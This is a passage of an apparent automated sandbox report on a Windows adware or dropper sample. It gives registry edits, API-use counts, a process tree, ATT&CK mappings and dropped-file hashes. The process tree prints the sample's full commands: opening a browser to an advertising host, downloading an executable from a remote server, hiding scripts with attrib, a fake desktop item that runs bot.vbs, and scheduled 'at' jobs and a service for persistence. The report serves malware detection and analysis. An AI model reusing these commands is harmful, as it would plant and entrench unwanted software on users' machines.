Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\LocalizedString = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\Attributes = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InfoTip = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4856	iexplore.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe
1688	cpa.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4856	iexplore.exe
4856	iexplore.exe
2200	IEXPLORE.EXE
2200	IEXPLORE.EXE
3268	msndown.exe
3268	msndown.exe
3268	msndown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2344 wrote to memory of 3700	2344	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe	84
PID 2344 wrote to memory of 3700	2344	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe	84
PID 2344 wrote to memory of 3700	2344	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe	84
PID 3700 wrote to memory of 2036	3700	WScript.exe	85
PID 3700 wrote to memory of 2036	3700	WScript.exe	85
PID 3700 wrote to memory of 2036	3700	WScript.exe	85
PID 2036 wrote to memory of 4856	2036	cmd.exe	87
PID 2036 wrote to memory of 4856	2036	cmd.exe	87
PID 3700 wrote to memory of 2260	3700	WScript.exe	89
PID 3700 wrote to memory of 2260	3700	WScript.exe	89
PID 3700 wrote to memory of 2260	3700	WScript.exe	89
PID 2260 wrote to memory of 1888	2260	cmd.exe	91
PID 2260 wrote to memory of 1888	2260	cmd.exe	91
PID 2260 wrote to memory of 1888	2260	cmd.exe	91
PID 2260 wrote to memory of 5072	2260	cmd.exe	93
PID 2260 wrote to memory of 5072	2260	cmd.exe	93
PID 2260 wrote to memory of 5072	2260	cmd.exe	93
PID 4856 wrote to memory of 2200	4856	iexplore.exe	92
PID 4856 wrote to memory of 2200	4856	iexplore.exe	92
PID 4856 wrote to memory of 2200	4856	iexplore.exe	92
PID 2260 wrote to memory of 2244	2260	cmd.exe	94
PID 2260 wrote to memory of 2244	2260	cmd.exe	94
PID 2260 wrote to memory of 2244	2260	cmd.exe	94
PID 2260 wrote to memory of 5000	2260	cmd.exe	95
PID 2260 wrote to memory of 5000	2260	cmd.exe	95
PID 2260 wrote to memory of 5000	2260	cmd.exe	95
PID 2260 wrote to memory of 404	2260	cmd.exe	96
PID 2260 wrote to memory of 404	2260	cmd.exe	96
PID 2260 wrote to memory of 404	2260	cmd.exe	96
PID 2260 wrote to memory of 232	2260	cmd.exe	97
PID 2260 wrote to memory of 232	2260	cmd.exe	97
PID 2260 wrote to memory of 232	2260	cmd.exe	97
PID 2260 wrote to memory of 4612	2260	cmd.exe	98
PID 2260 wrote to memory of 4612	2260	cmd.exe	98
PID 2260 wrote to memory of 4612	2260	cmd.exe	98
PID 2260 wrote to memory of 3708	2260	cmd.exe	99
PID 2260 wrote to memory of 3708	2260	cmd.exe	99
PID 2260 wrote to memory of 3708	2260	cmd.exe	99
PID 2260 wrote to memory of 3860	2260	cmd.exe	100
PID 2260 wrote to memory of 3860	2260	cmd.exe	100
PID 2260 wrote to memory of 3860	2260	cmd.exe	100
PID 2260 wrote to memory of 2812	2260	cmd.exe	101
PID 2260 wrote to memory of 2812	2260	cmd.exe	101
PID 2260 wrote to memory of 2812	2260	cmd.exe	101
PID 2260 wrote to memory of 2436	2260	cmd.exe	102
PID 2260 wrote to memory of 2436	2260	cmd.exe	102
PID 2260 wrote to memory of 2436	2260	cmd.exe	102
PID 2260 wrote to memory of 3892	2260	cmd.exe	103
PID 2260 wrote to memory of 3892	2260	cmd.exe	103
PID 2260 wrote to memory of 3892	2260	cmd.exe	103
PID 2260 wrote to memory of 1456	2260	cmd.exe	104
PID 2260 wrote to memory of 1456	2260	cmd.exe	104
PID 2260 wrote to memory of 1456	2260	cmd.exe	104
PID 2260 wrote to memory of 512	2260	cmd.exe	105
PID 2260 wrote to memory of 512	2260	cmd.exe	105
PID 2260 wrote to memory of 512	2260	cmd.exe	105
PID 2260 wrote to memory of 4504	2260	cmd.exe	106
PID 2260 wrote to memory of 4504	2260	cmd.exe	106
PID 2260 wrote to memory of 4504	2260	cmd.exe	106
PID 2260 wrote to memory of 820	2260	cmd.exe	107
PID 2260 wrote to memory of 820	2260	cmd.exe	107
PID 2260 wrote to memory of 820	2260	cmd.exe	107
PID 2260 wrote to memory of 4552	2260	cmd.exe	108
PID 2260 wrote to memory of 4552	2260	cmd.exe	108

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1888	attrib.exe
5072	attrib.exe
2244	attrib.exe

C:\Users\Admin\AppData\Local\Temp\c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3700
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?pc5566
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?pc5566
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4856
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4856 CREDAT:17410 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2260
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\Microsoft\bot.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1888
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\tool.cmd"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:5072
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\open.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2244
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5000
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:404
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:232
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:4612
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3708
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3860
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2812
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2436
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3892
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1456
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:512
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:4504
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:820
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:4552
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\Kingsoft\myfile\Microsoft\bot.vbs" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1844
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3176
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2740
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:772
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1928
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2676
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2944
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\fav\fav.cmd
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3040
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      System Service Discovery
      PID:3496
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:5048
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      System Location Discovery: System Language Discovery
      System Service Discovery
      PID:872
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        System Location Discovery: System Language Discovery
        System Service Discovery
        
        PID:912
  - - C:\Windows\SysWOW64\at.exe
      at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1592
  - - C:\Windows\SysWOW64\at.exe
      at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1320
  - - C:\Windows\SysWOW64\at.exe
      at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3752
  - - C:\Windows\SysWOW64\at.exe
      at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4676
  - - C:\Windows\SysWOW64\at.exe
      at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1604
  - - C:\Windows\SysWOW64\at.exe
      at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3204
  - - C:\Program Files\Kingsoft\myfile\soft\setup.exe
      "C:\Program Files\Kingsoft\myfile\soft\setup.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1852
  - - C:\Program Files\Kingsoft\myfile\soft\msn.exe
      "C:\Program Files\Kingsoft\myfile\soft\msn.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3640
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msndown.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\msndown.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3268
  - - C:\Program Files\Kingsoft\myfile\soft\cpa.exe
      "C:\Program Files\Kingsoft\myfile\soft\cpa.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Service Discovery

T1007

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Kingsoft\myfile\360.cmd

Filesize
1KB

MD5
3e54ff9d891714f4caf7911ce6d2ddce

SHA1
e7307a27eca905f1d8be37eed83731b541323707

SHA256
a3d8ffe9c729c41f8c9b276308c5f0be810e7855948e92a14c07e3e3672d9275

SHA512
1763f67d734af6d190416e618cf2be35be336f023f3df25827fbc45609509a49ea908d108fbb599c958f9224fc7749e16350c4d8812ff3be43e4f4fb423c1136

Download Submit
C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk

Filesize
104B

MD5
b26bdf8dd432f327015e14428a20790a

SHA1
a5db52d58ad5911ee4d54576335c250ccf86083e

SHA256
ff0f9b5b7634cadb7a4d58ccb1fa58c015217b6b890995c9ddc83156c9f8f43a

SHA512
a532c5b0a22e1cb09beab9d1acbe2a972a02d3a7c7782207410fe40f2a38316155dfc8de63be971ec1d69432ecd9033c971a588d65c40a5abb69d3f4792ba8d4

Download Submit
C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs

Filesize
173B

MD5
260221b2e318b36c446542c9edc50837

SHA1
d1041b615f1b1c513b27a8e9faa03abc7ff45d3f

SHA256
55c1c843af5160b59f214584e252c404d7857c33c8c13b08c9be7474d2f496e5

SHA512
a1c217ff54bf065ad4e1f337a436faf2b17bf20859b282b63f53b7430bac65ee3e0cd8a9b4ac054060095145f61c95bcaa4e5513331c69c8497cdc332322ac56

Download Submit
C:\Program Files\Kingsoft\myfile\cpa.cmd

Filesize
147B

MD5
c3e9df26e97da5adf239db77d4153331

SHA1
d2db1774b4f8d5e7e31de0e25c6781db751fe3f1

SHA256
bff0ee10b77f8badc3e205d255fc9912bea9e6244ecb4838fa21559eb4ff38b6

SHA512
67e8ac1dd8297a5915c47239d7e190abcdf5be600055c887bfb32e5aaae4baa9481ef4e378e7b71a7918dd3f4351f5b606eea34c5f319998d4675ac742acdc55

Download Submit
C:\Program Files\Kingsoft\myfile\fav\fav.cmd

Filesize
350B

MD5
bb8f16419df048980760537aa0381047

SHA1
fee995f3780355320925ca8368c7e93500ad1cd1

SHA256
80e3a0ae53a55fa995ebc555e8529f4d566d8f614b0933edbdf9ba2604d778fc

SHA512
9a2082a52cc1f84538002e5c16e5d6384854c129afb935d94122f1dcbf16064c8dbe59784b6332567b846c3dda48e441b2061228fdee9da2e4e552244a5450e0

Download Submit
C:\Program Files\Kingsoft\myfile\fav\tao.ico

Filesize
12KB

MD5
8320a22354a5419af035cdf42902ae93

SHA1
d9954707de08eaa6ecc7d13d69f76c51b316ebcc

SHA256
419408ac3e52f9b5878825dd3fc416a394ff5665208bbd36930ea52910be04bc

SHA512
592c4404292705321da9ec099ff60a22d396395acf31f900d4da661949a40c7966fcb20e7f8cadcd41c1dc729a290d68b21a74a352cb5b1b0a1b7b0ca1d5715b

Download Submit
C:\Program Files\Kingsoft\myfile\file.vbs

Filesize
1KB

MD5
853c5edb25a8a0084ca40d7d870a44a0

SHA1
0b212ee157afbbca5412f3655a1793179c23b518

SHA256
07a1ed641e79212fb19f9fcc7716288fb68613d3c5f9a99f9ad72c9e42482bf5

SHA512
1b63cd46e2d390de40165351d427f2bcc5eafedef9297a4dd1d3417bb40bac63db8a90d7b0631235cad0aaf1fad39ce63f0696e63967c978b22ffe7ccc3a7520

Download Submit
C:\Program Files\Kingsoft\myfile\open.vbs

Filesize
1002B

MD5
ae2af5c625b42c1e13cf26702cef7697

SHA1
eb0d7783826296ad37858870df932cbedc6d2342

SHA256
a50f01b0305d22c61988cac12af3449c0090f0a6c18ec412e5e8208740759bde

SHA512
55efed57559e803c62373076efdbc7c4006212380ed74dc5b81766bae479e67770c80a3b489061d45d5e652c1adc39436a791d70e5f774df1941d370836c1f5f

Download Submit
C:\Program Files\Kingsoft\myfile\runonce.cmd

Filesize
1KB

MD5
26546387c9729e1596eb8fd59106d300

SHA1
71ebf69d314ff28938a8addc85f66b023f8aeee7

SHA256
baf86a1340c31a317b43fc248813c6fc9ab54c9cca5aef1ce06c1ea74adcddf8

SHA512
fef7f7b7780f473c00fd6b0712664642258e838e377bb23280e3ce01c682e0ef2c259b52daa83429cddce47fff553f518be6631fe627cfbeb1c9172a1f69520c

Download Submit
C:\Program Files\Kingsoft\myfile\se.vbs

Filesize
185B

MD5
a73213963e201e9acfe8dbc0d600c8b9

SHA1
da47e1386f1ecfd8c74a921692c2ba1771809d45

SHA256
aa030802da33024e86cea9f904afab8faa02b525d94c8d967e10efda06996d1f

SHA512
1b9274253cdb5da75b13144df77e7e30c5b0490411b532c7414855185666c4b1ef2e376ae94208ff30e73424324539d780317e073311f1fc2ad04d3520aac617

Download Submit
C:\Program Files\Kingsoft\myfile\se1.vbs

Filesize
186B

MD5
c27ea5d91a982b0532daae2474d8db89

SHA1
64f064d3dc396519f270179a2afb3a2b12870147

SHA256
3a3ea968f86fa81532b2542de80d53cde5dde26315b8649fedd9b4d74643f0d7

SHA512
f450203d57cddebd4af434edaf3b5f7d336a787a13bb96cfff2db7f5f8074b3c65c48e1be9e0bf3d8e75c131166d2b4b0ee6f16b2e298955624584fac453cec0

Download Submit
C:\Program Files\Kingsoft\myfile\soft\cpa.exe

Filesize
30KB

MD5
14d36aa5385335e7f01c7e6c820f8b75

SHA1
83a0fafff4678f93d99fcc5169c04f85555dd9bb

SHA256
7b778d4b51090be8fce99624ab4f58e0ce8e02f8d9a27b52ba5c648f6064edf3

SHA512
7c36652529bc41a56e1af708df1c3f0a78ba69bc8afe7d174f561e62c90ee3a11bb9e0bfbfe539610cbc61f2051ca8947350a26d5e872fc464f101ea7c29361b

Download Submit
